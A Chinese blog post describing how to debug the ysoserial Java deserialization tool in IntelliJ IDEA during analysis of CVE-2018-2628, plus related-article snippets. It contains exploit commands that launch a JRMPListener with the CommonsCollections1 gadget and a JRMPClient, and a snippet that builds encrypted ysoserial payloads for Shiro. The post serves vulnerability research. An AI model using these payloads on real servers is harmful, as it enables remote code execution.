ysoserial 动态调试

最新推荐文章于 2024-08-09 07:24:17 发布
最新推荐文章于 2024-08-09 07:24:17 发布
阅读量1.5k 收藏
点赞数 1
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sojrs_sec/article/details/103688805
版权

前言

在尝试对cve-2018-2628反序列化漏洞做分析的时候,发现一个比较重要的概念是JRMP,而在ysoserial中已经实现了JRMP的客户端和服务端,所以想可以直接进行动态调试一下,大概了解下JRMP的机制,下面简单讲一下ysoserial的调试方法

调试步骤:

Cve-2018-2628需要开启JRMPListener以及JRMPClient,这里我以调试JRMPClient为例,参照前文的复现漏洞文章,查看其python的源码,可知其命令为

java -jar ./ysoserial-0.0.5-all.jar JRMPClient 192.168.96.111:1099

在这里插入图片描述

下载源码,使用idea导入ysoserial包,会自动下载相关依赖
在这里插入图片描述

这里注意,开启JRMPListener的命令为

java -cp ysoserial-0.0.5-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 "touch /tmp/sojrs.txt"

而启动JRMPClient为

java -jar ./ysoserial-0.0.5-all.jar JRMPClient 192.168.96.111:1099

表示JRMPListener在exploit相关目录
而JRMPClient在payload目录,这里注意下,因为在exploit目录同时存在JRMPListener和JRMPClient文件,我们调试是对payload目录下的进行调试
在这里插入图片描述

然后配置JRMPClient参数为JRMPClient 192.168.96.111:1099
在这里插入图片描述
现在debug,就能正常断点,进行动态调试了,可以看到,我们的参数已经传入成功
在这里插入图片描述

参考链接

ysoserial调试

sojrs_sec
关注
专栏目录
ysoserial Java反序列化漏洞利用实践
悦分享
08-04 3391
ysoserial这款工具,堪称为“java反序列利用神器”。
ysoserial CC5利用链分析
weixin_45805993的博客
11-16 501
前两天东华杯没打,看里面签到题用到了 BadAttributeValueExpException.做入口类似的链子,就来学习下同样用了这个类的CC5 Gadget Gadget chain: ObjectInputStream.readObject() BadAttributeValueExpException.readObject() TiedMapEntry.toString() LazyMap.get()
java安全(六)java反序列化2,ysoserial调试
weixin_45694388的博客
04-19 3929
ysoserial 下载地址:https://github.com/angelwhu/ysoserial ysoserial可以让⽤户根据⾃⼰选择的利⽤链,⽣成反序列化利⽤数据,通过将这些数据发送给⽬标,从⽽执⾏⽤户预先定义的命令。 什么是利⽤链? 利⽤链也叫“gadget chains”,我们通常称为gadget。如果你学过PHP反序列化漏洞,那么就可以将gadget理解为⼀种⽅法,它连接的是从触发位置开始到执⾏命令的位置结束,在PHP⾥可能 是 __desctruct 到 eval ;如果你没学过其他语
ysoserial.jar
06-01
shrio反序裂化利用工具,JAVA反序裂化利用工具。 https://github.com/frohoff/ysoserial 源码编辑而来。 def generator(command, fp,key): if not os.path.exists(fp): print('Jar zai na ne ?') raise Exception('jar file not found!') popen = subprocess.Popen(['java', '-jar', fp, 'URLDNS', command], stdout=subprocess.PIPE) BS = AES.block_size pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode() mode = AES.MODE_CBC iv = uuid.uuid4().bytes encryptor = AES.new(base64.b64decode(key), mode, iv) file_body = pad(popen.stdout.read()) base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body)) return base64_ciphertext 代码中需要的jar包
ysoserial.net 使用教程
最新发布
gitblog_00145的博客
08-09 602
ysoserial.net 使用教程 ysoserial.netDeserialization payload generator for a variety of .NET formatters项目地址:https://gitcode.com/gh_mirrors/ys/ysoserial.net 项目介绍 ysoserial.net 是一个开源的工具,用于生成利用各种.NET反序列化漏洞的有...
java 使用 idea 调试 ysoserial
whatday的专栏
08-01 1341
用Intellij IDEA调试Java项目是研究Java安全的必备技能点,之前在其他地方分享过相关方法,这次在土司也分享一下,省点复活币 。 以 https://github.com/frohoff/ysoserial 为例,下载源码,然后用Intellij IDEA打开。如果这个项目里面包含了pom.xml文件,说明这个是用maven打包的项目,这时候Intelliy IDEA会自动根据其中的配置下载依赖。如果依赖有问题,你可以手工点击菜单里的Files - Project Structure,然后配
手机调试java代码_【奇技淫巧】Intellij IDEA调试ysoserial等Java项目的方法
weixin_33524659的博客
02-27 148
maven-assembly-plugin就是一个用来打包项目的插件,可以把依赖、类文件什么的都打包在一起。这里的mainClass的值是 ysoserial.GeneratePayload ,这个就是主类。根据这个配置,打开文件src/main/java/ysoserial/GeneratePayload.java,看到其中的main函数了吗,如图1。点左边的小箭头,里面有个debug,这就是调...
小楼昨夜又春风,你知ysoserial-Gadget-URLDNS多少?
Summer's blog
05-13 3668
小楼昨夜又春风,你知ysoserial-Gadget-URLDNS多少? 你真的懂ysoserial其中的Gadget-URLDNS了吗?你确定吗?百分之百?不确定,还不来看看?
代码审计-ysoserial-C3P0分析
cdyunaq的博客
11-22 257
介绍 C3P0是一个开源的JDBC连接池,它实现了数据源和JNDI绑定,支持JDBC3规范和JDBC2的标准扩展。目前使用它的开源项目有Hibernate、Spring等。 基础使用 先看看ysoserial中需要的依赖是啥,方便后期调试也可以用 Pom.xml <!-- https://mvnrepository.com/artifact/com.mchange/c3p0 --> <dependency> <groupId>com.mchange&.
ysoserial-0.0.4-all.jar
09-17
ysoserial-0.0.4-all.jar系统自动生成分数,我也改不了,分数不够的可以联系我私发。
ysoserial-0.0.5-all.jar
08-27
ysoserial-0.0.5-all.jar反序列化漏洞利用,jar可以直接使用
ysoserial-0.0.6-SNAPSHOT-all.jar
12-19
ysoserial-0.0.6 也可自行下载编译 提供个下载链接:https://jitpack.io/com/github/frohoff/ysoserial/master-v0.0.5-gb617b7b-16/ysoserial-master-v0.0.5-gb617b7b-16.jar
java反序列化工具ysoserial.jar浅析
谢公子的博客
07-19 8812
ysoserial.jar ysoserial是集合了各种java反序列化payload的工具,项目地址:https://github.com/frohoff/ysoserial
ysoserial-v0.0.5.jar
09-22
shiro反序列化漏洞的检查工具, 在githup上兜兜转转找了挺久, 上传留着给同事们分享,其他需要的拿去.
ysoserial安装
08-16
要安装 ysoserial,你可以按照以下步骤进行操作: 1. 首先,确保你已经安装了 Java Development Kit (JDK)。你可以在命令行中运行 `java -version` 来检查是否已经安装了 JDK。 2. 在你的操作系统上创建一个文件夹...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值